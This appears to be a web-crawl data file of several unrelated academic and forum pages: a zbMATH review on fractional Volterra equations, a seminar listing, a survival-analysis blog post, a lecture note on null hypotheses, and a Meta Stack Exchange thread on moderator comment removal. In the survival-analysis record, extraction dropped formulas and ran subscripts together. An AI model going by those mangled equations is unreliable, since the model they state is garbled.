{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 20, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7114419937133789, "perplexity": 118.06172593083993}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710972.37/warc/CC-MAIN-20221204104311-20221204134311-00106.warc.gz"}
|
https://zbmath.org/?q=an:1259.65210
|
# zbMATH — the first resource for mathematics
##### Examples
Geometry Search for the term Geometry in any field. Queries are case-independent. Funct* Wildcard queries are specified by * (e.g. functions, functorial, etc.). Otherwise the search is exact. "Topological group" Phrases (multi-words) should be set in "straight quotation marks". au: Bourbaki & ti: Algebra Search for author and title. The and-operator & is default and can be omitted. Chebyshev | Tschebyscheff The or-operator | allows to search for Chebyshev or Tschebyscheff. "Quasi* map*" py: 1989 The resulting documents have publication year 1989. so: Eur* J* Mat* Soc* cc: 14 Search for publications in a particular source with a Mathematics Subject Classification code (cc) in 14. "Partial diff* eq*" ! elliptic The not-operator ! eliminates all results containing the word elliptic. dt: b & au: Hilbert The document type is set to books; alternatively: j for journal articles, a for book articles. py: 2000-2015 cc: (94A | 11T) Number ranges are accepted. Terms can be grouped within (parentheses). la: chinese Find documents in a given language. ISO 639-1 language codes can also be used.
##### Operators
a & b logic and a | b logic or !ab logic not abc* right wildcard "ab c" phrase (ab c) parentheses
##### Fields
any anywhere an internal document identifier au author, editor ai internal author identifier ti title la language so source ab review, abstract py publication year rv reviewer cc MSC code ut uncontrolled term dt document type (j: journal article; b: book; a: book article)
Numerical solutions to fractional perturbed Volterra equations. (English) Zbl 1259.65210
Summary: A class of perturbed Volterra equations of convolution type with three kernel functions is considered. The kernel functions $g_\alpha = t^{\alpha - 1}/\Gamma(\alpha)$, $t > 0$, $\alpha \in [1, 2]$, correspond to the class of equations interpolating heat and wave equations. The results obtained generalize our previous results from 2010.
##### MSC:
65R20 Integral equations (numerical methods) 45D05 Volterra integral equations 45E10 Integral equations of the convolution type 26A33 Fractional derivatives and integrals (real functions)
Full Text:
##### References:
[1] J. Prüss, Evolutionary Integral Equations and Applications, Birkhäuser, 1993. · doi:10.1007/978-3-0348-8570-6 [2] A. Karczewska and C. Lizama, “Stochastic Volterra equations under perturbations,” preparation. · Zbl 1314.60134 [3] H. Holden, B. Øksendal, J. Ubøe, and T. Zhang, Stochastic Partial Differential Equations, Birkhäuser Boston Inc., Boston, Mass, USA, 1996. · Zbl 0860.60045 [4] A. Kilbas, H. Srivastava, and J. Trujillo, Theory and Applications of Fractional Differential Equations, vol. 204 of North-Holland Mathematical Studies, Elsevier, 2006. · Zbl 1092.45003 [5] Leszczyński, An Introduction to Fractional Mechanics, The Publishing Office of Czestochowa University of Technology, Czestochowa, Poland, 2011. · Zbl 1276.34065 [6] R. L. Magin, Fractional Calculus in Bioengineering, Begel House Inc, Redding, Calif, USA, 2006. [7] F. Mainardi, “Fractional calculus: some basic problems in continuum and statistical mechanics,” in Fractals and Fractional Calculus in Continuum Mechanics (Udine, 1996), vol. 378, pp. 291-348, Springer, Vienna, Austria, 1997. · Zbl 0917.73004 [8] A. Karczewska, Convolution Type Stochastic Volterra Equations, vol. 10 of Lecture Notes in Nonlinear Analysis, Juliusz Schauder Center for Nonlinear Studies, 2007. · Zbl 1149.60041 [9] A. Karczewska and C. Lizama, “On stochastic fractional Volterra equations in Hilbert space,” Discrete and Continuous Dynamical Systems A, pp. 541-550, 2007. · Zbl 1163.60316 · http://www.aimsciences.org/journals/redirecting.jsp?paperID=2861 [10] A. Karczewska and C. Lizama, “Stochastic Volterra equations driven by cylindrical Wiener process,” Journal of Evolution Equations, vol. 7, no. 2, pp. 373-386, 2007. · Zbl 1120.60062 · doi:10.1007/s00028-007-0302-2 [11] A. Karczewska, “On difficulties appearing in the study of stochastic Volterra equations,” in Quantum probability and related topics, vol. 27, pp. 214-226, World Scientific, 2011. · Zbl 1258.60039 [12] A. Karczewska and C. Lizama, “Solutions to stochastic fractional relaxation equation,” Physica Scripta T, vol. 136, Article ID 014030, 2009. · Zbl 1158.60028 · doi:10.1088/0031-8949/2009/T136/014030 [13] A. Karczewska and C. Lizama, “Strong solutions to stochastic Volterra equations,” Journal of Mathematical Analysis and Applications, vol. 349, no. 2, pp. 301-310, 2009. · Zbl 1158.60028 · doi:10.1016/j.jmaa.2008.09.005 [14] A. Karczewska and C. Lizama, “Solutions to stochastic fractional oscillation equations,” Applied Mathematics Letters, vol. 23, no. 11, pp. 1361-1366, 2010. · Zbl 1202.60099 · doi:10.1016/j.aml.2010.06.032 [15] Y. Fujita, “Integrodifferential equation which interpolates the heat equation and the wave equation,” Osaka Journal of Mathematics, vol. 27, no. 2, pp. 309-321, 1990. · Zbl 0796.45010 [16] W. R. Schneider and W. Wyss, “Fractional diffusion and wave equations,” Journal of Mathematical Physics, vol. 30, no. 1, pp. 134-144, 1989. · Zbl 0692.45004 · doi:10.1063/1.528578 [17] D. Baleanu, K. Diethelm, E. Scalas, and J. J. Trujillo, Fractional Calculus Models and Numerical Methods, Complexity, Nonlinearity and Chaos, World Scientific, Boston, Mass, USA, 2012. · Zbl 1248.26011 [18] I. Podlubny, Fractional Differential Equations, vol. 198, Academic Press, San Diego, Calif, USA, 1999. · Zbl 0924.34008 [19] S. G. Samko, A. A. Kilbas, and O. I. Marichev, Fractional Integrals and Derivatives, Gordon and Breach Science, Linghorne Pa, USA, 1993. · Zbl 0818.26003 [20] D. Baleanu and J. I. Trujillo, “A new method of finding the fractional Euler-Lagrange and Hamilton equations within Caputo fractional derivatives,” Communications in Nonlinear Science and Numerical Simulation, vol. 15, no. 5, pp. 1111-1115, 2010. · Zbl 1221.34008 · doi:10.1016/j.cnsns.2009.05.023 [21] R. Gorenflo and F. Mainardi, “Fractional calculus: integral and differential equations of fractional order,” in Fractals and Fractional Calculus in Continuum Mechanics (Udine, 1996), vol. 378 of CISM Courses and Lectures, pp. 223-276, Springer, Vienna, Austria, 1997. · Zbl 0916.34011 [22] J. Sabatier and O. P. Agrawal, Tenreiro Machado, Advances in Fractional Calculus: Theoretical Developments and Applications in Physics and Engineering, Springer, Berlin, Germany, 2007. · Zbl 1116.00014 [23] R. Hilfer, Ed., Applications of Fractional Calculus in Physics, World Scientific, Singapore, 2000. · Zbl 0998.26002 [24] R. Magin, X. Feng, and D. Baleanu, “Solving the fractional order Bloch equation,” Concepts in Magnetic Resonance Part A, vol. 34, no. 1, pp. 16-23, 2009. [25] R. L. Magin, “Fractional calculus models of complex dynamics in biological tissues,” Computers & Mathematics with Applications, vol. 59, no. 5, pp. 1586-1593, 2010. · Zbl 1189.92007 · doi:10.1016/j.camwa.2009.08.039 [26] C. Canuto, M. Y. Hussaini, A. Quarteroni, and T. A. Zang, Spectral Methods, Springer, Berlin, Germany, 2006. [27] C. Li, F. Zeng, and F. Liu, “Spectral approximations to the fractional integral and derivative,” Fractional Calculus and Applied Analysis, vol. 15, no. 3, pp. 383-406, 2012. · Zbl 1276.26016 · doi:10.2478/s13540-012-0028-x [28] B. Bandrowski, A. Karczewska, and P. Rozmej, “Numerical solutions to integral equations equivalent to differential equations with fractional time,” International Journal of Applied Mathematics and Computer Science, vol. 20, no. 2, pp. 261-269, 2010. · Zbl 1201.35020 · doi:10.2478/v10006-010-0019-1 · eudml:207985 [29] R. Barrett, M. Berry, T. F. Chan, and et al., Templates for the Solution of Linear Systems: Building Blocks for Iterative Methods, Society for Industrial and Applied Mathematics (SIAM), Philadelphia, Pa, USA, 1994. · doi:10.1137/1.9781611971538 [30] H. A. van der Vorst, “Bi-CGSTAB: a fast and smoothly converging variant of Bi-CG for the solution of nonsymmetric linear systems,” Society for Industrial and Applied Mathematics, vol. 13, no. 2, pp. 631-644, 1992. · Zbl 0761.65023 · doi:10.1137/0913035 [31] Y. Saad and M. H. Schultz, “GMRES: a generalized minimal residual algorithm for solving nonsymmetric linear systems,” Society for Industrial and Applied Mathematics, vol. 7, no. 3, pp. 856-869, 1986. · Zbl 0599.65018 · doi:10.1137/0907058 [32] D. Kincaid and W. Cheney, Numerical Analysis: Mathematics of Scientific Computing, University of Texas at Austin, 2002. · Zbl 0877.65002
|
2016-05-06 05:37:28
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.591336727142334, "perplexity": 4671.88077648192}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-18/segments/1461861727712.42/warc/CC-MAIN-20160428164207-00160-ip-10-239-7-51.ec2.internal.warc.gz"}
|
https://math.gatech.edu/seminars-and-colloquia-by-series?series_tid=29
|
## Seminars and Colloquia by Series
Wednesday, September 4, 2019 - 13:55 , Location: Skiles 005 , , University of Crete , , Organizer:
Wednesday, April 10, 2019 - 13:55 , Location: Skiles 005 , , Georgia Tech , , Organizer: Josiah Park
When equiangular tight frames (ETF's), a type of structured optimal packing of lines, exist and are of size $|\Phi|=N$, $\Phi\subset\mathbb{F}^d$ (where $\mathbb{F}=\mathbb{R}$, $\mathbb{C}$, or $\mathbb{H}$), for $p > 2$ the so-called $p$-frame energy $E_p(\Phi)=\sum\limits_{i\neq j} |\langle \varphi_{i}, \varphi_{j} \rangle|^p$ achieves its minimum value on an ETF over all sized $N$ collections of unit vectors. These energies have potential functions which are not positive definite when $p$ is not even. For these cases the apparent complexity of the problem of describing minimizers of these energies presents itself. While there are several open questions about the structure of these sets for fixed $N$ and fixed $p$, we focus on another question:
What structural properties are expressed by minimizing probability measures for the quantity $I_{p}(\mu)=\int\limits_{\mathbb{S}_{\mathbb{F}}^{d-1}}\int\limits_{\mathbb{S}_{\mathbb{F}}^{d-1}} |\langle x, y \rangle|^p d\mu(x) d\mu(y)$?
We collect a number of surprising observations. Whenever a tight spherical or projective $t$-design exists for the sphere $\mathbb{S}_{\mathbb{F}}^d$, equally distributing mass over it gives a minimizer of the quantity $I_{p}$ for a range of $p$ between consecutive even integers associated with the strength $t$. We show existence of discrete minimizers for several related potential functions, along with conditions which guarantee emptiness of the interior of the support of minimizers for these energies.
This talk is based on joint work with D. Bilyk, A. Glazyrin, R. Matzke, and O. Vlasiuk.
Wednesday, April 3, 2019 - 13:55 , Location: Skiles 005 , Alex Stokolos , Georgia Southern , Organizer: Galyna Livshyts
In this talk we will discuss some some extremal problems for polynomials. Applications to the problems in discrete dynamical systems as well as in the geometric complex analysis will be suggested.
Wednesday, March 27, 2019 - 13:55 , Location: Skiles 005 , , University of Minnesota , , Organizer: Galyna Livshyts
Many problems of spherical discrete and metric geometry may be reformulated as energy minimization problems and require techniques that stem from harmonic analysis, potential theory, optimization etc. We shall discuss several such problems as well of applications of these ideas to combinatorial geometry, discrepancy theory, signal processing etc.
Wednesday, March 13, 2019 - 13:55 , Location: Skiles 005 , , Ursinus college , , Organizer: Galyna Livshyts
The Bishop-Phelps-Bolloba ́s property for numerical radius says that if we have a point in the Banach space and an operator that almost attains its numerical radius at this point, then there exist another point close to the original point and another operator close to the original operator, such that the new operator attains its numerical radius at this new point. We will show that the set of bounded linear operators from a Banach space X to X has a Bishop-Phelps-Bolloba ́s property for numerical radius whenever X is l1 or c0. We will also discuss some constructive versions of the Bishop-Phelps- Bolloba ́s theorem for l1(C), which are an essential tool for the proof of this result.
Wednesday, March 6, 2019 - 13:55 , Location: Skiles 005 , Hong Wang , MIT , Organizer: Shahaf Nitzan
If $f$ is a function supported on a truncated paraboloid, what can we say about $Ef$, the Fourier transform of f? Stein conjectured in the 1960s that for any $p>3$, $\|Ef\|_{L^p(R^3)} \lesssim \|f\|_{L^{\infty}}$.
We make a small progress toward this conjecture and show that it holds for $p> 3+3/13\approx 3.23$. In the proof, we combine polynomial partitioning techniques introduced by Guth and the two ends argument introduced by Wolff and Tao.
Wednesday, February 27, 2019 - 13:55 , Location: Skiles 005 , Anna Skripka , University of New Mexico , Organizer: Galyna Livshyts
Linear Schur multipliers, which act on matrices by entrywisemultiplications, as well as their generalizations have been studiedfor over a century and successfully applied in perturbation theory. Inthis talk, we will discuss extensions of Schur multipliers tomultilinear infinite dimensional transformations and then look intoapplications of the latter to approximation of operator functions.
Wednesday, February 20, 2019 - 13:55 , Location: Skiles 005 , Steven Heilman , USC , Organizer: Galyna Livshyts
It is well known that a Euclidean set of fixed Euclidean volume with least Euclidean surface area is a ball. For applications to theoretical computer science and social choice, an analogue of this statement for the Gaussian density is most relevant. In such a setting, a Euclidean set with fixed Gaussian volume and least Gaussian surface area is a half space, i.e. the set of points lying on one side of a hyperplane. This statement is called the Gaussian Isoperimetric Inequality. In the Gaussian Isoperimetric Inequality, if we restrict to sets that are symmetric (A= -A), then the half space is eliminated from consideration. It was conjectured by Barthe in 2001 that round cylinders (or their complements) have smallest Gaussian surface area among symmetric sets of fixed Gaussian volume. We discuss our result that says this conjecture is true if an integral of the curvature of the boundary of the set is not close to 1. https://arxiv.org/abs/1705.06643 http://arxiv.org/abs/1901.03934
Wednesday, February 13, 2019 - 13:55 , Location: Skiles 005 , Michael Loss , Georgia Tech , Organizer: Shahaf Nitzan
In this talk I present some variational problems of Aharanov-Bohm type, i.e., they include a magnetic flux that is entirely concentrated at a point. This is maybe the simplest example of a variational problems for systems, the wave function being necessarily complex. The functional is rotationally invariant and the issue to be discussed is whether the optimizer have this symmetry or whether it is broken.
Wednesday, February 6, 2019 - 13:55 , Location: Skiles 005 , Dario Alberto Mena , University of Costa Rica , Organizer: Galyna Livshyts
We prove sparse bounds for the spherical maximal operator of Magyar,Stein and Wainger. The bounds are conjecturally sharp, and contain an endpoint esti-mate. The new method of proof is inspired by ones by Bourgain and Ionescu, is veryefficient, and has not been used in the proof of sparse bounds before. The Hardy-Littlewood Circle method is used to decompose the multiplier into major and minor arccomponents. The efficiency arises as one only needs a single estimate on each elementof the decomposition.
|
2019-06-27 02:17:12
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7798404097557068, "perplexity": 880.3239352414865}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560628000610.35/warc/CC-MAIN-20190627015143-20190627041143-00525.warc.gz"}
|
https://econometricsense.blogspot.com/2012/04/survival-analysis.html
|
## Thursday, April 19, 2012
### Survival Analysis
Let ‘T’ be a random variable time to event. Then the distribution of ‘T’ can be described as follows:
The Hazard function is a conditional density function giving the instantaneous risk that an event will occur at time‘t’.
Using R, crude plots of f(t), F(t), S(t), and h(t) for λ = .5 are given below:
If we let h(t) = λ or λ0 or ln h(t) = ln(λ0) = μ be the ‘baseline’ hazard, we can easily extend the model to include covariates as such:
h(t) = λ0(t) exp(β 1X12X2)
ln h(t) = ln[λ0(t) exp(β 1X12X2)]
= ln λ0(t) + ln[exp(β 1X12X2)]
= μ + β 1X12X2
Note: if X1 and X2 = 0 then we get the baseline hazard
Cox Proportional Hazards Model
If we specify the hazard for two individuals i and i’ :
hi(t) = λ0(t) exp(β 1X1i2X2i)
hi’(t) = λ0(t) exp(β 1X1i’2X2i’)
Then the proportional hazard for individual i relative to i’ can be written as:
hi(t)/ hi’(t) = λ0(t) exp(β 1X1i2X2i)/ λ0(t) exp(β 1X1i’2X2i’)
with the ‘baseline’ hazard term cancelling out we get:
hi(t)/ hi’(t) = exp[β 1(X1 i –X1i’) +β2(X2 i –X2i’) ] or e ζ i- ζ i’
As a result, we don’t have to explicitly know the functional form of the baseline hazard to calculate the proportional hazard.
Partial Likelihood Estimation
The parameters for the proportional hazard model are estimated via partial likelihood estimation.
Introducing a censoring indicator ‘ci’ {=0 if censored at event time else 1} we can express the likelihood function as:
Instead of maximizing the full likelihood specified above, Cox proposed estimating the partial likelihood which does not include the baseline hazard function:
The risk set contains subjects at risk for the event at time ‘ti ‘when the event was observed for subject ‘i’. Censoring times are excluded from the likelihood.
Based on the Cox model, hazard was proportional to exp(xi'B) The ratio in the partial likelihood represents the hazard for subject ‘i’ relative to the cumulative hazard for all other subjects at risk at the time subject ‘i’ experienced the event. The estimates for β can be derived by maximizing Lp(β) , and can be interpreted as follows:
References:
Survival Analysis Using SAS: A Practical Guide. Paul D. Allison. 1995. The SAS Institute.
Cox Proportional-Hazards Regression for Survival Data:
Appendix to An R and S-PLUS Companion to Applied Regression. John Fox Februrary 2002
Introduction to Survival Analysis. Sociology 761 Lecture Notes. John Fox. 2006.
Introduction to Survival Analysis. (ppt presentation). Kristin Sainani. Ph.D. Stanford University. Department of Health Research and Policy. http://www.stanford.edu/~kcobb
|
2022-12-07 21:04:24
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8710549473762512, "perplexity": 8168.052254280042}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711218.21/warc/CC-MAIN-20221207185519-20221207215519-00703.warc.gz"}
|
http://nila.lecture.ub.ac.id/2014/01/
|
### Archive
Archive for January, 2014
## Null Hypothesis
After almost a year supervising students for conducting research and writing their final thesis, I found the students used to forget how to test hypothesis. First, students forgot to choose null hypothesis and the alternative before the sample is drawn. According to Kothari (2004), doing so can avoid the students from the error of deriving hypotheses from the data that he collects, and then testing the hypotheses from the same data. Please keep these considerations in mind when choosing the null hypothesis.
1. The null hypothesis is the one which the researcher wishes to disprove; alternative hypothesis is the one which the researcher wishes to prove. Hence, a null hypothesis represents the hypothesis we attempt to reject, and alternative hypothesis represents all other possibilities.
2. If the rejection of a certain hypothesis when it is actually true involves great risk, the researcher must take it as null hypothesis. It is because the probability of rejecting the hypothesis when it is true is α (the level of significance) which is chosen very small.
3. The null hypothesis should be simple and specific, not state about or approximately a certain value. For example, µ = µH0 is a null hypothesis; while µ = µH0 or µ = µH0 or µ = µH0 is a composite or nonspecific or alternative hypothesis.
Second, they forgot hypotheses that they supposedly measured were the null hypothesis. The one we test is the null hypothesis; this is the one that we try to reject. Mostly students derive hypothesis from assumptions, as they are convinced by theories and are suggested by findings of prior studies. The assumptions lead them to construct hypotheses that they wish to accept, not to reject. However, they forgot to reverse the statement and develop the null hypothesis. Instead, students tested hypotheses that they desire to accept, it is the one that consistent with theories and prior studies.
A study proceeds hypothesis testing on the basis of null hypothesis, while it keeps the alternative hypothesis in our mind. According to Kothari (2004), this is because on the assumption that null hypothesis is true, one can assign the probabilities to different possible sample results. But, this cannot be done if we proceed with the alternative hypothesis.
Reference: CR Kothari (2004), Research Methodology: Methods and Techniques, New Age International Publishers, India.
Categories: Lecture Tags:
|
2018-07-19 03:28:45
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8001775741577148, "perplexity": 1217.8275616759774}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676590493.28/warc/CC-MAIN-20180719031742-20180719051742-00524.warc.gz"}
|
https://aviation.meta.stackexchange.com/questions/3408/can-removing-comments-by-a-moderator-on-their-own-answer-be-considered-a-conflic
|
# Can removing comments by a moderator on their own answer be considered a conflict of interest?
Referring to this question and this question. Both were answered by a moderator. Both answers attracted a lot of comments asking for clarifications and pointing out potential flaws.
In both cases comments were removed to chat, by the moderator that provided the answer, in doing so removing the comments from immediate view, and providing a use-by-date before the chat will be marked inactive. The chat is only visible to people who click on the chat link, and while reading the chats the original question/answer is not visible.
This is my understanding of the use and value of comments: comments underneath an answer or question are immediately visible for any person looking up the question/answer, and provide context. A good comment is relevant to the contents of the question or answer. When clarifications are asked or faults pointed out, the reaction can either be added in the answer when the poster reckons it adds to the value of the question/answer to everyone, or otherwise in a comment. A set of comments, good or bad, form a frame of reference of the different viewpoints of the public using the forum.
On the other hand, long and prolonged discussions between two or three parties are often boring for the rest of us, and take away from the value of the post. So there are pros and cons to a long set of comments, that is understood.
The issue here though is a potential conflict of interest. Only moderators can remove comments from everyone from posts, the rest of us need to live with them, whether valuable or not. Moderators could potentially leave a flawed answer, and remove criticising comments from them. Please note that I say potentially.
We have more than one moderator, although sometimes it does not seem that way. Would a possible solution be for another moderator to judge whether a multitude of comments on the post of a moderator should be hidden from immediate reference in a chat room?
EDIT
There have been some up-voted comments on this post, a way for the community to express what they think about my question. However I won't be paying any attention to them, the comments may be removed at any time, as @Jamiec points out.
So I won't add another comment but will edit this into the question.
@ Jamiec: "If its in a comment, its transient, and might be removed at any time"
• Why at a time when the question is still highly active?
• And more importantly: why by the person who may have a direct vested interest? If it appears so, why not handle things in a way that removes that appearance.
• Comments are generally meant to be ephemeral in the Stack model anyhow -- if they're that valuable to the answer, their content should be edited in to the answer. Nov 21, 2017 at 2:49
• @UnrecognizedFallingObject Sure. Would you consider changing your comment to an answer? Nov 21, 2017 at 3:59
• FWIW had I have seen those long comment threads (and the associated flags) I would have also moved them to chat. That is the agreed process, and the reason why that is a shortcut in the mod tooling.
– Jamiec Mod
Nov 21, 2017 at 9:19
• @Jamiec FWIW? If it's put in a comment, it is worth nothing. Nov 21, 2017 at 9:43
• @Koyovis Nowhere does it say "If its in a comment its worth nothing". What it says is "If its in a comment, its transient, and might be removed at any time".
– Jamiec Mod
Nov 21, 2017 at 11:14
• @Jamiec Yes I have read that. That is not what the question is about, it is signalling a potential conflict of interest. If I post a flawed answer that attracts multiple comments pointing out flaws, I do not have the option to remove them all. Nov 22, 2017 at 6:36
I am not a mod on this site, but this is a topic that does come up on other sites, including those I am a mod on so I have a few years' experience in this space.
In general, while it is standard to remove comments, as anything of value in them should be incorporated into the question or answer, mods will usually leave this action to another mod just to avoid any perception of a conflict of interest.
However, if that is unlikely to be timely, or if there are numerous flags, any mod will do it. The thing to remember is that mod actions are very visible to other mods, and to CMs and SE staff, which does keep us all honest, and we typically are driven in the first instance by flags from the community so we know the action is requested.
## Edit it in if it's that valuable
One thing we aren't very good at as a community on Aviation is cleaning up comment threads and getting the good stuff from them edited into the associated posts. Comments on a Stack are meant to be ephemeral entities anyway -- if a comment thread isn't currently being useful, it probably should be cleaned up and its associated post edited to reflect what the comments unearthed.
• Yes we're not very good at it and it should be edited in.It doesn't answer the question though. Nov 21, 2017 at 9:54
• That may be true for the general case, but in cases where there's a difference of opinion (e.g. when fooot said "I'm not convinced the points from the Goodyear manual necessarily apply.", who's to decide what's valuable/useful? That's exactly what the conflict of interest here is about: if the answerer is a moderator he can remove helpful comments because he wrongfully doesn't consider them valuable. Nov 29, 2017 at 15:48
• I generally agree, but I want to make one exception. Comments with a good joke, or a well-received light hearted remark (as indicated by the many upvotes) are valuable to the site so they should not be deleted nor be edited in.
– DeltaLima Mod
Nov 30, 2017 at 17:39
It appears that way, but it is not.
When a post (question or answer) has 20 or more comments, a flag is automatically raised for mods to delete the comments. I have never seen so far that a mod has deleted those comments but did not move them in a chat room. So the critique is in the chat, not under a post. This way, if someone is interested to further read the discussion, it is in chat, which is public too.
Ironically, it happened twice that both you and that mod answered a question and he happened to clean up the comments because of flag.
You should not expect [comments] to be around forever
As I mentioned in my (now deleted) comment, you did the right thing by providing an answer. This is the positive response if or when you feel that another answer is not 100% correct.
• It appears that way, but it is not. You then explain that there is a procedure and an automatic flag. Which have existed for a long time and were used sparingly and with care, which I reckon is good judgement. This is the first time I can see an action & comment from yourself, and the communication is well phrased and moderate in tone. A moderator - what's in a name? Nov 23, 2017 at 2:21
• IMO this glosses over the real issues here: comments may be ephemeral, but moderators have the power to make them more short-lived. Your answer is like saying it's ok that they're moving comments to a separate page because they were already less prominent. Additionally, if there's a flag, doesn't that make it easier, not harder, to get a different mod to clean up the comments? Nov 29, 2017 at 15:57
My opinion is a short one. Comments are for clarification and are ephemeral. Period. Anyone can flag one, and any moderator is expected to clean things up.
If an answer is wrong, in your opinion, the proper way to deal with it is to vote down the answer. A comment is not necessary. If you do leave one, and I try to every time, well if the comment disappears, so be it. You've still voted on the answer.
In the Stack Exchange model, there might be 5 answers, 4 of which are correct and valid, and a fifth which supports the questioner's belief. That one may be selected as the accepted answer, and there is not much we can do, except to down vote. Please use the tools that are given, in the way they are meant to be. If you need to discuss a question, or an answer, that is what aviation chat is for.
• It does not answer the question. I reckon that comments are more valuable than chatrooms, as also indicated by the pop-up window that appears when you hover over the up-vote triangle left of the comment: This comment adds something useful to the post. But my main point is a potential conflict of interest. The rest of us cannot remove critical comments. Nov 24, 2017 at 14:49
I think yes, there is a potential conflict of interest, although in most cases the comments are going to be moved anyways, no matter who does it. Most of the other answers ignore the realities of how Stack Exchange works in practice. In reality comments are much longer-lived and visible than chat rooms, many constructive comments are never incorporated, and other moderators' oversight and voting don't fairly resolve many disputes about answer details.
My recommendation is twofold:
1. To avoid the appearance of impropriety, moderators should avoid doing moving comments on their own questions, especially when they disagree with some of the comments.
2. I'd recommend that comment authors and moderators try more openly to get comments worked into the answer, rather than letting them die in comments or especially chat.
Every time there are more than 20 comments in 3 days, a flag appears suggesting the moderators move the comments to chat. The mod who moves the comments doesn't have to be the answerer. All mods see the flag, don't they? In practice it seems moderators almost always move every single comment to chat, although officially, moderators "should only move comments to chat when there appears to be an ongoing constructive discussion involving two or more individuals that has lost its direct relevance to the post." (source)
High visibility of other moderators' behavior is just a mitigating factor. In truth, that's usually how moderator's are kept honest in their many chances to abuse their privileges. However, this just means the issue isn't a big deal, not that there's any advantage or disadvantage to having moderators avoid moving comments on their own answers.
Yes, this does have the effect of downplaying the important comments. The viewer now has to conciously decide he wants to see the comments (how often do you decide this yourself?). It's harder in a chat to see which comments were highly upvoted feedback and which are pointless conversation. Additionally, the chat room may be deleted just because it's "inactive", unlike comments.
Comments may not be permanent, but is it right for moderators in this situation to make them even more short-lived? Saying this is ok because comments are short lived rests on the assumption that comments in chat rooms are, for this purpose, basically as long-lived as comments should be. That doesn't sound right. In reality, a dissenting comment will stick around for years, while a chat room will likely be deleted in a few months.
Valuable comments should technically be added to the answer. In truth this often happens, as it did for the first question you linked about instability during landings. However, in practice this often doesn't happen, especially if the answerer disagrees about how "valuable" the comment is, providing a potential conflict of interest. The usual recourse here is to post a separate dissenting answer, which hopefully will get noticed by new visitors to the question and upvoted.
What are some recourses?
• Create a separate answer if you disagree with the post and your comments aren't being incorporated
